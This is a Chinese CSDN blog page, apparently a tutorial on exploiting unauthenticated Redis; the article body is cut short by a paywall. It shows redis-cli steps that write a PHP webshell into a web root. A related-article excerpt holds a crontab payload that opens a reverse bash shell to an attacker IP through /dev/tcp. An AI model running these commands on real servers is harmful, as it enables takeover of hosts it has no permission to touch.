中间件框架漏洞-Readis未授权访问漏洞

最新推荐文章于 2024-06-18 16:01:59 发布
最新推荐文章于 2024-06-18 16:01:59 发布
阅读量422 收藏
点赞数
分类专栏: 中间件框架漏洞 redis未授权访问漏洞 文章标签: 中间件 redis 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69555575/article/details/127037999
版权
本文探讨了Redis未授权访问的原理,当Redis服务端口开放且无密码认证时,允许任意用户进行未授权操作。文章详细介绍了三种利用这种漏洞的方法:通过Redis写入webshell,写入SSH公钥获取shell,以及利用crontab反弹shell。
摘要由CSDN通过智能技术生成

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

中间件框架漏洞-Readis未授权访问漏洞

提示:以下是本篇文章正文内容,下面案例可供参考

一、Redis未授权原理

原理:简单的理解,当redis服务(6379)端口对外开放且未做密码认证时,任意用户可未授权访问redis服务并操作获取数据。

二、三种利用redis未授予权访问漏洞

1.利用redis写webshell

1.redis-cli -h 192.168.75.131
2.config set dir /var/www/html
3.config set dbfilename redis.php
4.set x "\r\n\r\n<?php phphinfo();?>\r\n\r\n" 这样就成功写如shell

可以写入一句话木马,菜刀连接
当数据库过大时,redis写shell的小技巧:(借鉴学习的)如下

<?php 
set_time_limit
最低0.47元/天 解锁文章
杜康。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
中间件安全-jenkins授权访问
ce666666的博客
01-23 578
0x01 前言 跟着百度一步步做,也算是认识了​ 0x02 jenkins是什么? Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。 ps:不搞java开发,了解即可。 0x03 漏洞概述 授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。默认端口为8080 0x04 漏洞复现 .
中间件安全-Elasticsearch授权
ce666666的博客
01-23 1282
前言 掌握一下技术,学习学习 Elasticsearch是什么? 基于java开发的企业级搜索服务,提供分布式多用户的全文搜索引擎。 启动此服务默认会开放9200端口,可被非法操作数据 漏洞概述 当节点启动,会利用多播或单播寻找集群中的其他节点,并建立连接。默认开启9200端口,黑客就可以搜索信息。相当于一个API,任何人访问这个地址,就可以调用api,进行数据的增删改操作。http://x.x.x.x:9200/_nodeshttp://x.x.x.x:9200/_river 漏洞测试 下载该软件,安
常见的web中间件&java框架漏洞&总结
bobo_milk的博客
05-21 1453
对近期的web中间件漏洞进行了解。因此我对常见的web中间件漏洞进行了收集以及整理。(本篇文章将持续更新) 文章目录 一、IIS 二、Apache 三、Nginx 四、Tomcat 一、IIS IIS6.x 解析漏洞 原理:服务器默认不解析; 号及其后面的内容,相当于截断 *.asp;.jpg的文件会当成asp文件执行;/*.asp文件夹下的文件也会被当作asp脚本执行 另外,IIS6.x除了会将扩展名为....
授权访问漏洞总结
最新发布
m0_64481831的博客
06-18 1298
以下总结了常见的授权访问漏洞,还在持续更新中,遇到就会补充。欢迎大家关注~
框架中间件漏洞
niqiu320的博客
04-23 802
Struts 2漏洞简介 Apache Struts 2 最初被称为Webwork2,它是一个简洁的,可扩展的框架,可用于创建企业级java web应用程序,设计这个框架是为了从构建,部署,到应用程序维护方面来简化整个开发周期。 Struts2漏洞是一个远程命令执行漏洞和开放重定向漏洞,利用漏洞, 黑客可发起远程攻击,不但可以获取网站数据信息,甚至还可取得网站服务器控制权。而且,目前针对此漏洞的自动化工具开始出现,攻击者无需具备与漏洞相关的专业知识即可侵入服务器,直接执行命令操作,盗取数据甚至进行毁灭性操作
授权访问:Atlassian Crowd授权访问漏洞
qq_68163788的博客
05-17 1128
Atlassian Crowd是一套基于Web的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。 Atlassian Crowd Data Center是Crowd的集群部署版。Atlassian Crowd和Crowd Data Center在其某些发行版本中错误地启用了pdkinstall开发插件,使其存在安全漏洞。 攻击者利用该漏洞可在授权访问的情况下对Atlassian Crowd和Crowd Data Center安装任意的恶意插件,执行任意代码/命令
web渗透常见漏洞总结
gugonggugong的博客
01-14 3515
一、SQL注入 1. 原理 SQL:结构化查询语言 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 SQL注射能使攻击者绕过认证机制,完全控制远程服务器上的数据库。 当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击;如果代码使用存储过程,而这些存储过程作为包含筛选的用户输入的字符串来传递,也会发生sql注入。 2. 不同数据库的注入 MySQL access...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 967
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5523
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处授权访问
Redis 授权访问渗透之旅
weixin_45971758的博客
06-29 430
redis 的靶机的漏洞复现的前提条件:redis都是使用root用户进行运行,否则很多保存文件的操作无法实现,也就无法实现webshell 上传,修改ssh公钥,修改计划任务。所以web站点凡是使用redis中间件,都要进行基线检查加固,防止黑客利用授权访问漏洞提权,造成主机失陷。
内网渗透常见授权访问
weixin_40766105的博客
01-03 4845
1.zookeeper授权访问 开放端口:2181 ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。 它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。ZooKeeper的目标就是封装好复杂易出错的关键服务,将简单易用的接口和性能高效、功能稳定...
Spring Boot Actuator授权访问漏洞利用
weixin_50995890的博客
11-29 1769
这个漏洞一般是授权导致信息泄露,更进一步危害还需要找敏感信息,比如sql、redis等账号密码,不过一般都存在这些东西
中间件安全—Tomcat常见漏洞
zzz6583zz的博客
05-08 1420
链接。
利用Weblogic中间件存在的SSRF漏洞结合redis授权访问漏洞GetShell
wenqingshuo321的博客
10-11 791
在Search Public Registries,选择Public Registry中的 IBM,同时勾选Search by business name,开启bp进行抓包,点击search。set 1 "\n\n\n\n * * * * * root bash -i >& /dev/tcp/{本地物理机ip}/1234 0>&1\n\n\n\n"给redis服务器发送三条命令,将其写入redis的容器里里面的/etc/crontab,从而将shell反弹到本地物理机ip的1234端口。
授权访问漏洞汇总
weixin_46137328的博客
09-23 7559
本文共11695个字,可以先收藏后看。漏洞概览: Elasticsearch授权访问漏洞 Hadoop授权访问漏洞 Jenkins授权访问 MongoDB授权访问 Zoo...
Druid授权漏洞进一步的利用
qq_53058639的博客
05-26 1591
对于druid授权,大多数白帽子在做测试的时候都是当作一个低危的信息泄露来处理,但是其实如果利用条件都达成了,运气够好的话,造成的危害还是不小的。这也告诉我们以后碰到这种授权漏洞,可以多收集一些信息,扩宽一下测试思路,说不定就能获得更大的收获。
IIS中间件漏洞分析及修复策略
"这篇文档是关于Web中间件常见漏洞的总结,主要针对微软的IIS (Internet Information Services)。文档详细介绍了IIS6.x和IIS7.x版本中的解析漏洞、上传安全问题以及修复建议。" 在Web开发中,中间件扮演着至关重要...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值